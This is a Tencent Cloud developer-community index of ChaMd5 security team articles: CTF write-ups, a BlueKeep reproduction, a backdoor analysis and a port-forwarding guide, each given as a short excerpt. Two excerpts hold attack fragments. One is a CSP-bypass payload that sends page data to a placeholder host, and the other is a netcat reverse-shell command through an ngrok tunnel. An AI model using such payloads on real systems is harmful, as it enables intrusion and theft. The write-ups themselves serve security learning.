腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
ChaMd5安全团队
专栏成员
举报
114
文章
181943
阅读量
61
订阅数
订阅专栏
申请加入专栏
全部文章(114)
其他(24)
安全(23)
网络安全(17)
php(16)
编程算法(13)
https(11)
安全漏洞(10)
github(8)
git(6)
http(6)
java(5)
python(5)
sql(5)
c++(4)
文件存储(4)
网站(4)
游戏(4)
html(3)
单片机(3)
windows(3)
ios(2)
lua(2)
xml(2)
json(2)
云数据库 SQL Server(2)
ubuntu(2)
nginx(2)
存储(2)
比特币(1)
mac os(1)
c 语言(1)
javascript(1)
c#(1)
bash(1)
actionscript(1)
jsp(1)
vue.js(1)
android(1)
arm(1)
数据库(1)
oracle(1)
web.py(1)
ide(1)
api(1)
struts(1)
linux(1)
apache(1)
容器镜像服务(1)
apt-get(1)
企业(1)
webpack(1)
开源(1)
shell(1)
dns(1)
npm(1)
tcp/ip(1)
udp(1)
powershell(1)
nat(1)
搜索文章
搜索
搜索
关闭
【翻译】看我如何利用PHP的0day黑掉Pornhub并获得2W美刀奖励
php
文件存储
https
c 语言
网络安全
在分析了Pornhub使用的平台之后,我们在其网站上检测到了unserialize函数的使用,其中的很多功能点(例如上传图片的地方等等)都受到了影响,例如下面两个URL:
ChaMd5安全团队
2019-10-31
1.8K
0
国际数字经济博览会安全大赛-Aliyun&Qcloud详细writeup
网络安全
sql
这次跟着Venom的师傅们一起参加了国际数字经济博览会的线下赛,谢谢师傅们带躺到第三hhh,CTF解题赛的三道云安全的题目感觉还挺经典的,拿了其中一道Aliyun题的一血,另一道题快做出来的时候队里的师傅就做出来了Orz,Jdyun的全程自闭没有做出来也是很遗憾(最终在主办方放了两个hint后第一名的M01N战队做出了全场唯一解,师傅们太强了),故写下wp记录一下。
ChaMd5安全团队
2019-10-21
959
0
TeamViewer攻陷疑云
apt-get
windows
https
网络安全
安全
TeamViewer是一个可用于Microsoft Windows、macOS、Linux、Chrome OS、iOS、Android、Windows RT、Windows Phone 8和黑莓操作系统等的远程控制软件。除了远程控制外,TeamViewer还包含合同协作与示范等功能。
ChaMd5安全团队
2019-10-14
1.2K
0
SSTI Bypass 分析
https
网络安全
python
html
护网杯过去不久,realworld到来之前先来研究研究SSTI的Bypass套路。
ChaMd5安全团队
2019-10-14
1.7K
0
“送给最好的TA.apk”简单逆向分析
网络安全
lua
android
java
20190927收到一个apk,名字叫“送给最好的TA.apk”。文件哈希值如下:
ChaMd5安全团队
2019-10-03
2.2K
0
phpstudy后门文件分析以及检测脚本
php
xml
网络安全
编程算法
2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件,基于研究的目的,于是有了以下这文。
ChaMd5安全团队
2019-09-25
974
0
"数字经济"云安全公测大赛 WriteUp
网络安全
Java 和 python 的 RSA 私钥加密略有不同,所以不浪费时间,直接从 apk 里抠出来加密部分,注意需要处理一下 base64 部分
ChaMd5安全团队
2019-09-25
1.1K
0
CVE-2019-0708微软RDP远程代码执行漏洞复现
https
网络安全
windows
github
git
BlueKeep(CVE-2019-0708)是微软远程桌面协议(RDP)实现中发现的一个安全漏洞,它允许远程执行代码。
ChaMd5安全团队
2019-09-10
2.6K
0
SUCTF-WriteUp(上)
游戏
编程算法
https
php
网络安全
https://gist.github.com/ed22c1ad2dc22c56f266a92635a9591c#file-str_or_str-php
ChaMd5安全团队
2019-08-23
1.4K
0
SUCTF-WriteUp(下)
c#
http
网络安全
编程算法
而后就有了几次任意地址读且栈溢的机会,因此直接在任意地址读时读取伪造CPPEH_RECORD需要的其他信息(cookie等)
ChaMd5安全团队
2019-08-23
1.4K
0
SCTF WriteUp
https
网络安全
php
npm
文件存储
Web math-is-fun1 解题思路 这里有变量覆盖: 可以覆盖全局变量: 使用跳转方式绕过 CSP: location.href=`//xxx.xxx.xxx.xxx/?${documen
ChaMd5安全团队
2019-07-08
1.1K
0
FireShell CTF WriteUp
actionscript
https
网络安全
c++
bash
招新小广告 ChaMd5 ctf组 长期招新 尤其是reverse+pwn+合约的大佬 欢迎联系admin@chamd5.org Web Bad Injection 解题思路 任意文件下载: url
ChaMd5安全团队
2019-03-07
1.4K
0
恭喜ChaMd5荣获Real World CTF第九名
网络安全
12月1-2日,在中国郑州,由长亭科技主办的首届Real World国际CTF网络安全大赛线下总决赛大幕开启。
ChaMd5安全团队
2018-12-24
1K
0
常见端口转发工具的使用方式(二)
shell
网络安全
c++
Ngrok Ngrok一个反向代理,通过在公共的端点和本地端口建立一个安全的通道,其功能可以反向代理出web服务还有端口转发,这里我们主要演示端口转发的功能 由于ngrok这个工具官网是要访问外国网站的,所以是能使用国内的Sunny-Ngrok 反弹nc shell 首先我们启动ngrok ./sunny clientid 隧道id 📷 本地监听端口: nc -vv -lp 9991 📷 目标机器: nc -vv server.ngrok.cc 33388 -e cm
ChaMd5安全团队
2018-03-29
1.2K
0
CTF学习站点总结
http
https
网络安全
github
git
CTF学习站点总结 0x00 前言 公众号的后台,有很多的朋友都在问,你们CTF是怎么入门的? 有没有什么东西能和我们分享下的? 有没有什么学习的网站啊之类的问题,想了很久,决定给大家分享一些。 没有py,ChaMd5 良心分享(重说三) http://www.chamd5.org/ 没有py,ChaMd5 良心分享(重说三) http://www.chamd5.org/ 没有py,ChaMd5 良心分享(重说三) http://www.chamd5.org/ 0x01 CTF 资讯 XCTF联赛
ChaMd5安全团队
2018-03-29
1.6K
0
永恒之石,你怕了吗?
网络安全
永恒之石,你怕了吗? From ChaMd5安全团队核心成员 逍遥自在 这个五月,我们经历了感染了7万5千台电脑的WannaCry,没有了紧急开关的 WannaCry2.0,好不容易快到月底了,想着能平平安安的过去了。突然晴天霹雳,EternalRocks(永恒之石)又来了,别急别急,不要怕,ChaMd5带你了解了解下这个病毒。 一打开新闻,小编都被吓到了,最新病毒EtermalRocks用了七个NSA漏洞!!!什么,七个,要知道永恒之蓝才只用了两个啊!难道又爆出了几个?小编都准备去找找新的神器了。
ChaMd5安全团队
2018-03-29
949
0
HBCTF第一场2个pwn题的简单分析
网络安全
【ChaMd5安全团队所有文章均来源实战,为保证厂商安全信息,文章内容以思路为主。 需要转载,请先联系ChaMd5安全团队授权。 未经授权请勿转载。】 HBCTF第一场2个pwn题的简单分析
ChaMd5安全团队
2018-03-29
1.5K
0
没有更多了
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
立即查看
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档
